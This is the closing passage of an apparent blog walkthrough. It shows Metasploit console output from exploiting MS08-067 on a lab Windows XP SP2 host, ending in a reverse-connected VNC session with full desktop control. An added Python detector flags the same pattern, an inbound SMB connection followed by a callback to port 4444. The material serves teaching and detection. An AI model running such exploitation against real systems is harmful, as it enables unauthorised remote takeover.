[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] Starting local TCP relay on 127.0.0.1:5900...
[*] Local TCP relay started.
[*] Launched vnciewer in the background.
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "snipped"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Same machine: preferring raw encoding
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1062)

This should pop up a VNC session with full desktop control of your Windows XP SP2 host. This is a dramatic way to show people the power of Metasploit and to reinforce the need for patching to your users.

I did a recent demonstration to a group of corporate helpdesk operators and they were quite surprised at just how easy it can be.
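Seen from the network rather than from msfcli, both sessions above have the same shape: an inbound connection to the target's SMB port from 192.168.56.1, then within seconds a brand-new outbound connection from the target back to that same peer on the handler port (4444). The correlation below is an added example, not part of the original post or of Metasploit; it runs over constructed connection records in the walkthrough's address space and generalises to any list of watched service ports.

```python
from collections import namedtuple
from datetime import datetime, timedelta

# One connection record as a flow collector or firewall log would provide it.
Flow = namedtuple("Flow", "ts src sport dst dport")


def detect_reverse_callbacks(flows, service_ports=(445,), max_gap_s=30):
    """Correlate an inbound connection to a watched service port (SMB/445 for
    MS08-067) with a NEW outbound connection from that host back to the same
    peer on some other port within `max_gap_s` seconds. In the session above
    that is 192.168.56.1 -> 192.168.56.101:445 followed by
    192.168.56.101:1050 -> 192.168.56.1:4444, the reverse_tcp stage/handler leg.
    Returns a list of (ts, victim, peer, callback_port, gap_seconds)."""
    last_inbound = {}   # (host, peer) -> ts of the latest inbound hit on a service port
    alerts = []
    for f in sorted(flows, key=lambda f: f.ts):
        if f.dport in service_ports:
            last_inbound[(f.dst, f.src)] = f.ts
            continue
        t_in = last_inbound.get((f.src, f.dst))
        if t_in is None:
            continue
        gap = (f.ts - t_in).total_seconds()
        if 0 <= gap <= max_gap_s:
            alerts.append((f.ts, f.src, f.dst, f.dport, int(gap)))
    return alerts


def constructed_flows():
    """Constructed records, not a real capture. Hosts and ports follow the
    walkthrough above: attacker 192.168.56.1, target 192.168.56.101."""
    t0 = datetime(2010, 6, 1, 10, 0, 0)
    return [
        # benign: a file server talks SMB to the target; the target never calls back
        Flow(t0, "192.168.56.50", 49152, "192.168.56.101", 445),
        # benign: ordinary outbound web traffic with no preceding inbound hit
        Flow(t0 + timedelta(seconds=5), "192.168.56.101", 1040, "192.168.56.200", 443),
        # exploit: inbound SMB from the attacker ...
        Flow(t0 + timedelta(seconds=60), "192.168.56.1", 35000, "192.168.56.101", 445),
        # ... then the target connects back to the attacker's handler on 4444
        Flow(t0 + timedelta(seconds=62), "192.168.56.101", 1050, "192.168.56.1", 4444),
        # benign: a connection to the file server long after its SMB session (outside window)
        Flow(t0 + timedelta(seconds=600), "192.168.56.101", 1060, "192.168.56.50", 80),
    ]


if __name__ == "__main__":
    for ts, victim, peer, port, gap in detect_reverse_callbacks(constructed_flows()):
        print(f"{ts:%H:%M:%S} {victim} -> {peer}:{port} opened {gap}s after inbound SMB from {peer}")
```

The VNC injection session (target port 1062 back to 192.168.56.1:4444) produces the same alert, since only the peer, the direction and the timing are used, not the payload.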
